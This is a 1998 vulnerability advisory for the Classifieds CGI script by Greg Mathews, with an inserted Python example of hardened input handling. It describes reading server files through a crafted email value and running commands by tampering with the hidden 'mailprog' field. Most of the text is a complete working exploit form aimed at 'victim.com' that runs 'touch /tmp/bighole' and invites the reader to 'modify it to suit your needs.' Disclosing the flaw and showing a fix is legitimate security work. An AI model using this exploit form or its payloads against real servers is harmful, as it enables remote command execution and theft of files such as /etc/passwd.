Vulnerable Program: Classifieds (classifieds.cgi)
         Platforms: UNIX
            Impact: remote users can execute commands with web server privs
          Found by: duke (duke@viper.net.au - duke@el8.org)
     Advisory Made: Tuesday, December 15, 1998
                    (happy birthday to raw and benbe! :P )

Information
-----------

Classifieds by Greg Mathews is a free CGI script for handling classified ads.
It is available from: http://cgi.notts.net. There are multiple security holes
in this script that allow remote command execution. Firstly, by setting your
email address to something like "duke@viper.net.au</etc/passwd", you can read
files remotely off the server.

Also, by altering the hidden variables in the HTML form, a remote user can
force arbitrary commands to be executed. One example of this is modifying the
following variable:

<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be
executed.
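The root cause in both holes is the same: form fields reach a shell-interpreted command line. As an added defensive example (not code from the original script, whose source is not on this page), the handler below ignores a client-supplied `mailprog`, allow-lists the address, and calls a fixed sendmail path with an argument list so no shell ever sees the data; the field names `return` and `mailprog` are taken from the form above, the function names are this example's own.

```python
"""Hardened handling of the two classifieds.cgi inputs the advisory describes."""
import re
import subprocess

# Fixed on the server side: the client must never be able to choose the program.
SENDMAIL = "/usr/sbin/sendmail"

# Allow-list for the recipient. Excludes shell metacharacters (< > | ; & `) and
# forbids a leading '-', so the value cannot be parsed by sendmail as an option.
EMAIL_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_email(addr: str) -> bool:
    """Accept only addresses matching the allow-list pattern."""
    return EMAIL_RE.fullmatch(addr) is not None


def build_mail_command(form: dict) -> list:
    """Return the argv list for the confirmation mail.

    A 'mailprog' field in the form (the advisory shows it set to a command) is
    deliberately ignored. The address becomes its own argv element, so even a
    validated value is never interpreted by a shell.
    """
    addr = form.get("return", "")
    if not validate_email(addr):
        raise ValueError("rejected recipient address: %r" % addr)
    return [SENDMAIL, "-oi", addr]


def send_confirmation(form: dict, body: str, run=subprocess.run) -> int:
    """Run sendmail without a shell and return its exit status.

    `run` is injectable so the logic can be exercised without a real MTA.
    shell=False (the default) means '<' or '|' in any field is a plain byte,
    not a redirection or pipe.
    """
    argv = build_mail_command(form)
    result = run(argv, input=body.encode(), check=False)
    return result.returncode


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's two payloads.
    tampered = {"return": "duke@viper.net.au", "mailprog": "touch /tmp/bighole"}
    print(build_mail_command(tampered))  # mailprog is ignored; fixed path used
    try:
        build_mail_command({"return": "duke@viper.net.au</etc/passwd"})
    except ValueError as exc:
        print("blocked:", exc)
```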

Exploit
-------

The following form is a sample exploit. Please note that if you are trying this
out on your own machine you need to create an HTML file for the "category" you
select (e.g. hifi.html), and the paths have to correctly locate this file, or the
script exits before it reaches the vulnerable code. For a remote server, copy
their path hidden fields, or it will not reach the vulnerable code.
This form just executes "touch /tmp/bighole". Modify it to suit your needs.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=Expires CONTENT="Tue, 04 Dec 1993 21:29:02 GMT">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<TITLE>notts.net Classifieds - Nottinghamshire's (UK) Community Site</TITLE>
<META NAME="Author" CONTENT="Greg Mathews - webmaster@notts.net">
<META NAME="description" CONTENT="Free Classifieds for the Community of Nottinghamshire in the UK">
<META NAME="keywords" CONTENT="nottinghamshire Nottinghamshire notts Notts nottingham Nottingham UK uk U.K. u.k. United Kingdom united kingdom Free free Classified classified business Business Web web Home home page Page homepage Homepage advertising Advertising ads adds Ads Adds">
</HEAD>
<BODY BGCOLOR="#ffffff" TEXT="#000000" link="#008000" vlink="#800040">
<CENTER><a href="http://notts.net"><IMG SRC="http://notts.net/images/nottsnet.gif" BORDER=0 alt="notts.net - Nottinghamshire Community Site" width=400 height=63></a></CENTER>
<font face="COMIC SANS MS,ARIAL">
<BLOCKQUOTE><H1><font color="#004080">notts.net</font> Classifieds -</H1><P>
Welcome to the Classifieds.  Got something you want to sell?  Looking to buy?  This is the place!  And you can place your classified ad for FREE! for two weeks.<p>
<hr>
<h2>Instructions for Using the Classifieds</h2><p>
<b>Submitting Your Classified Ad</b><br>
To submit your classified ad, fill out the form below completely and select "Post a New Ad".  If the form is not filled out completely, your ad will not be added to the system.  When done, select "Postad" located at the bottom of the page.<p>

<b>Viewing Classified Ads</b><br>
To view classified ads, select one of the departments available to view.
Then, select "ViewAds" at the bottom of the Table.
<p>

<b>Removing your Classified Ads</b><br>
If you have posted a classified ad and wish to remove it at any time, i.e.if your product has been sold then please <a href="remove.html">Click Here</a>
<p><hr>


<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="duke@viper.net.au">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?</b><p>

<center><table width=80%>
<tr><td><input type=radio name="Department" value="accom"> Accommodation</td><td><input type=radio name="Department" value="animals"> Animals</td></tr>
<tr><td><input type=radio name="Department" value="children"> Children</td><td><input type=radio name="Department" value="clothing"> Clothing</td></tr>
<tr><td><input type=radio name="Department" value="computers"> Computers</td><td><input type=radio name="Department" value="computersoftware"> Computer Software</td></tr>
<tr><td><input type=radio name="Department" value="furniture"> Furniture</td><td><input type=radio name="Department" value="hifi"> Hi-Fi</td></tr>
<tr><td><input type=radio name="Department" value="kitchen"> Kitchen Appliances</td><td><input type=radio name="Department" value="leisure"> Leisure </td></tr>
<tr><td><input type=radio name="Department" value="misc"> Misc.</td><td><input type=radio name="Department" value="baby"> Mother & Baby</td></tr>
<tr><td><input type=radio name="Department" value="cars"> Motor</td><td><input type=radio name="Department" value="tv"> TV & Video</td></tr>
</table><P><input type=submit name="Selection" value="ViewAds"></center><p>

<pre>               <b>Your Name:</b> <input type=text name="RealName" size=30 maxlength=45>
          <b>E-Mail Address:</b> <input type=text name="E-MailAddress" size=30 maxlength=60>
                 <b>Address:</b> <input type=text name="Address1" size=30 maxlength=60>
<b>Address2 (if applicable):</b> <input type=text name="Address2" size=30 maxlength=60>
                    <b>City:</b> <input type=text name="City" size=30 maxlength=60>
           <b>State/Country:</b> <input type=text name="State" size=10>
                <b>Zip Code:</b> <input type=text name="ZipCode" size=10 maxlength=10>
           <b>Daytime Phone:</b> <input type=text name="Phone" size=14 maxlength=18></pre><br>

<p>

<b>What is the subject of your ad? </b><input type=text name="AdSubject" size=40 maxlength=40><p>
<b>If your desired department was not listed above, what department would you prefer more?</b><br>
<input type=text name="DesiredDepartment" size=40 maxlength=40><p>
<b>Please enter a brief description below (No HTML, Use && to start new paragraph.):</b><br>
<textarea name="Description" cols=65 rows=5 wrap=virtual></textarea><p>
<p>
<b>Enter URL of page to link to (Optional): </b><br>
<input type=text name="Linkurl" size=60 value="http://"><p>
<b>Enter title of page to link to (Optional): </b><br>
<input type=text name="Linktitle" size=60><p>
<input type=submit name="Selection" value="PostAd">
<input type=reset value="Clear All"><p>
</form>


</BLOCKQUOTE></body></HTML>